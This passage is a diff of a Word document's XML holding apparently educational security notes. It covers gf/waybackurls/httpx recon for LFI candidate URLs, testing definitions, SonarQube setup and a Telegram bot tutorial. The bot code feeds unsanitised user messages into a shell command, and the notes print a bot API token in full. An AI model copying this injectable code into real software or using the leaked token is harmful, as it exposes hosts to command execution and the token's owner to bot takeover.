+        <w:t>$  git clone https://github.com/1ndianl33t/Gf-Patterns</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>$ sudo mv Gf-Patterns/*.json ~/.gf</w:t>
+      </w:r>
+      <w:r>
         <w:t>/</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>waybackurls@latest</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">$ cat alive.txt | </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>waybackurls</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> | tee wayback.txt</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -11758,204 +7948,66 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>GF-PATTERNS:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>````````````</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>````````</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>$ go install github.com/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>tomnomnom</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>gf@latest</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>$ echo 'source $GOPATH/pkg/mod/github.com/tomnomnom/gf@v0.0.0-20200618134122-dcd4c361f9f5/gf-completion.bash' &gt;&gt; ~/.</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>zshrc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">$ </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>mkdir</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> .gf</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>$ cp -r $GOPATH/pkg/mod/github.com/tomnomnom/gf@v0.0.0-20200618134122-dcd4c361f9f5/examples ~/.gf</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>$  git clone https://github.com/1ndianl33t/Gf-Patterns</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">$ </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> mv Gf-Patterns/*.</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>json</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ~/.gf</w:t>
-      </w:r>
-      <w:r>
-        <w:t>/</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
+        <w:t>Example: LFI:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>```````````````````</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>$ cat wayback.txt | gf lfi | httpx -silent | tee lfi.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>$ cat wayback.txt | gf interestingEXT | httpx -silent | tee interestingEXT.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t>--------------------------------------------------------------------------------------------------------------------------</w:t>
       </w:r>
     </w:p>
@@ -11971,152 +8023,6 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Example: LFI:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>``````````````</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>`````</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">$ cat wayback.txt | gf </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>lfi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> | </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>httpx</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -silent | tee lfi.txt</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">$ cat wayback.txt | gf </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>interestingEXT</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> | </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>httpx</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -silent | tee interestingEXT.txt</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>--------------------------------------------------------------------------------------------------------------------------</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
         <w:t>Testing:</w:t>
       </w:r>
     </w:p>
@@ -12174,13 +8080,8 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Its</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> a part of SDLC, its used to ensure that the code to be deployed with no bug and no logic errors.</w:t>
+      <w:r>
+        <w:t>Its a part of SDLC, its used to ensure that the code to be deployed with no bug and no logic errors.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12346,15 +8247,7 @@
       </w:r>
       <w:r>
         <w:tab/>
-        <w:t xml:space="preserve">[ To </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>fulfill</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> the requirements of client/customer ]</w:t>
+        <w:t>[ To fulfill the requirements of client/customer ]</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -12385,14 +8278,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>````````````````````</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>`````````</w:t>
+        <w:t>`````````````````````````````</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12577,13 +8463,8 @@
     <w:p>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">- </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>CasperJS</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>- CasperJS</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -12618,24 +8499,12 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>````````````````````</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>````</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Its</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> like debugging or examine the code before run or test the code without executing it. In this testing we analyse code against a pre-set of coding rules and ensure it confirms to the guidelines.</w:t>
+        <w:t>````````````````````````</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Its like debugging or examine the code before run or test the code without executing it. In this testing we analyse code against a pre-set of coding rules and ensure it confirms to the guidelines.</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -12723,23 +8592,13 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">- </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Sonarqube</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">- </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>pycharm</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>- Sonarqube</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>- pycharm</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -12778,27 +8637,12 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>``````````</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>```````</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Open Source Static Code Analysis tool. </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Its</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> used by developers to manage source code quality and consistency.</w:t>
+        <w:t>`````````````````</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Open Source Static Code Analysis tool. Its used by developers to manage source code quality and consistency.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12863,61 +8707,41 @@
     <w:p>
       <w:r>
         <w:tab/>
-        <w:t xml:space="preserve">- </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>js</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-        <w:t xml:space="preserve">- </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>py</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-        <w:t xml:space="preserve">- </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>c++</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:tab/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-        <w:t xml:space="preserve">- </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>php</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>- js</w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>- py</w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>- c++</w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>- php</w:t>
+      </w:r>
       <w:r>
         <w:tab/>
       </w:r>
@@ -12956,14 +8780,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>``````````````````````````````</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>```````````````</w:t>
+        <w:t>`````````````````````````````````````````````</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12989,29 +8806,8 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">$ </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> docker run -d --name </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sonarqube</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">-custom --restart unless-stopped -p 9000:9000 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sonarqube:community</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>$ sudo docker run -d --name sonarqube-custom --restart unless-stopped -p 9000:9000 sonarqube:community</w:t>
+      </w:r>
     </w:p>
     <w:p/>
     <w:p>
@@ -13071,44 +8867,864 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
+        <w:t>````````````````</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t># wget https://binaries.sonarsource.com/Distribution/sonar-scanner-cli/sonar-scanner-cli-8.0.1.6346-linux-x64.zip</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t># unzip sonar-scanner-cli-8.0.1.6346-linux-x64.zip</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t># cd sonar-scanner-8.0.1.6346-linux-x64/bin/</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t># ln -s /root/sonar/sonar-scanner-8.0.1.6346-linux-x64/bin/sonar-scanner /bin/sonar-scanner</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Telegram Chat Bot</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>`````````````````</w:t>
+      </w:r>
+      <w:r>
         <w:t>``````````</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>``````</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve"># </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>wget</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> https://binaries.sonarsource.com/Distribution/sonar-scanner-cli/sonar-scanner-cli-8.0.1.6346-linux-x64.zip</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t># unzip sonar-scanner-cli-8.0.1.6346-linux-x64.zip</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t># cd sonar-scanner-8.0.1.6346-linux-x64/bin/</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t># ln -s /root/sonar/sonar-scanner-8.0.1.6346-linux-x64/bin/sonar-scanner /bin/sonar-scanner</w:t>
-      </w:r>
-    </w:p>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>1. open telegram</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>2. search for `@botfather` and select verified account</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>3. /newbot</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>4. choose name: gabbar_bot</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>5. choose username: d_cdac_bot</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>t.me/d_cdac_bot</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>6. Copy HTTP API token</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Done! Congratulations on your new bot. You will find it at t.me/d_cdac_bot. You can now add a description, about section and profile picture for your bot, see /help for a list of commands. By the way, when you've finished creating your cool bot, ping our Bot Support if you want a better username for it. Just make sure the bot is fully operational before you do this.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Use this token to access the HTTP API:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>7048999836:AAEZKyKfst2gpjiYgI-s13GmoKGGW0wNqQs</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Keep your token secure and store it safely, it can be used by anyone to control your bot.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>pip3 install python-telegram-bot==13</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>from telegram.ext import *</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>import subprocess as ss</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>telegram_token = 'token'</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>updater = Updater(telegram_token, use_context=True)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>dispatcher = updater.dispatcher</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>def start(update, context):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">    name = update.effective_user.first_name</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">    update.message.reply_text("Welcome {}".format(name))</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>def message_handler(update, context):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">    message = update.message</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">    out = ss.getoutput("subfinder -d {} -silent".format(message.text))</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">    update.message.reply_text(out)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>dispatcher = updater.dispatcher</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>updater.dispatcher.add_handler(CommandHandler('start', start))</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>updater.dispatcher.add_handler(MessageHandler(Filters.text, message_handler))</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>updater.start_polling()</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>updater.idle()</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:t>----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>googlecolab</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>put each code in separate cell</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
